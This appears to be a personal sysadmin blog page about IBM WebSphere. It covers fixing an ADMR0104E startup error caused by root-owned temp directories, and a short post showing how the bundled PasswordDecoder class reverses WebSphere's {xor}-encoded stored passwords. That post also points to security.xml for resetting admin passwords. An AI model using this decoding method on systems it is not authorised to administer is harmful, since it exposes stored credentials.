Server CloneID=”179d5sb” ConnectTimeout=”5″ ExtendedHandshake=”false” LoadBalanceWeight=”20″ MaxConnections=”-1″ Name=”Node2″ ServerIOTimeout=”900″ WaitForContinue=”false”
…
…
Server CloneID=”179d8gc” ConnectTimeout=”5″ ExtendedHandshake=”false” LoadBalanceWeight=”21″ MaxConnections=”-1″ Name=”Node3″ ServerIOTimeout=”900″ WaitForContinue=”false”
…
…

Do let me know if you have better ideas of solving it.

Resolving ADMR0104E for Application Server

This write up serve to record the resolution for the ADMR0104E error encountered by Websphere Application server during start up. The Application Server eventually is unable to start up.

From “SystemOut.log”, we see that the system is unable to read some properties file.

[6/27/12 12:08:35:103 SGT] 00000000 FileDocument E ADMR0104E: The system is unable to read document cells/Cell01/nodes/Node01/node-metadata.properties: java.io.IOException: Permission denied
at java.io.File.checkAndCreate(File.java:1715)
at java.io.File.createTempFile(File.java:1803)
at com.ibm.ws.management.repository.FileDocument.createTempFile(FileDocument.java:564)
at com.ibm.ws.management.repository.FileDocument.read(FileDocument.java:500)
at com.ibm.ws.management.repository.FileRepository.extractInternal(FileRepository.java:1134)

Some research and checks revealed that the permissions on the temp directory under the application server profile had been changed. The application server would then be no longer able to write to the temp directory for the node in the below directory.

# ls -ltr
total 0
drwxr-xr-x 3 root system 256 Jun 27 11:54 download

The cause of this is the start up of the application server using root. That’s the reason why the above temp directory is owned by root.

Potentially, you should check the ffdc directory as well.

# ls -l //AppSrv01/logs/ | grep ffdc
drwxr-xr-x 2 appusr appgrp 49152 Jun 27 13:50 ffdc

Research from the internet, the directory owner and the process execution user should be in the same group and be at least of permission 774. TO be fail safe, change the ownership/group as required under //profiles/ and //profiles/.

Once the ownership is reverted back to “appusr”, we should see the result as below.

# chown -R appusr:appgrp download

# ls -ltr
total 0
drwxr-xr-x 3 appusr appgrp 256 Jun 27 11:54 download

The Application server is able to start up now.

[6/27/12 12:21:56:692 SGT] 00000000 AdminTool A ADMU3000I: Server appsrv open for e-business; process id is 4128910{code}

We can also check the process execution of the application server in order to compare to the file system permissions, one can do the following:

1. Open the admin console
2. Open Servers –> Application Servers –>
3. Open Java Process Management –> Server Execution
4. Look for username and group of executing user

Thats all.

Recover websphere password

Google online and found this interesting step to recover websphere 7.1 password.

For encrypting the password we have,

//java/bin/java -Djava.ext.dirs=//deploytool/itp/plugins/com.ibm.websphere.v7_7.0.1.v20100710_0411/wasJars/ -cp securityimpl.jar:iwsorb.jar com.ibm.ws.security.util.PasswordEncoder secret

The output is

decoded password == “secret”, encoded password == “{xor}LDo8LTor”

Hence, you can use the same method to decrypt the encrypted password.

//java/bin/java -Djava.ext.dirs=//deploytool/itp/plugins/com.ibm.websphere.v7_7.0.1.v20100710_0411/wasJars/ -cp securityimpl.jar:iwsorb.jar com.ibm.ws.security.util.PasswordDecoder {xor}LDo8LTor

The output is

encoded password == “{xor}LDo8LTor”, decoded password == “secret”

If you want to know, you can update the password for the deployment manager and nodes without knowing the password. Check out /…/config/cells//security.xml. 🙂

Recent Posts

Pages

Categories

Archives

Recent Comments

Categories

Remove logs after hack Linux

MBR vs GPT

Removing Linux BASH SHELLSHOCKER MALWARE

Centos 7 SYSTEMCTL && Run level && hostname

Centos 7 Samba

Centos7 Apache HTTP SERVER

LDAP repository in Websphere Application Server 7

Allowing longer web session going through Apache to Websphere Application Server

Resolving ADMR0104E for Application Server

Recover websphere password

PRODUCTS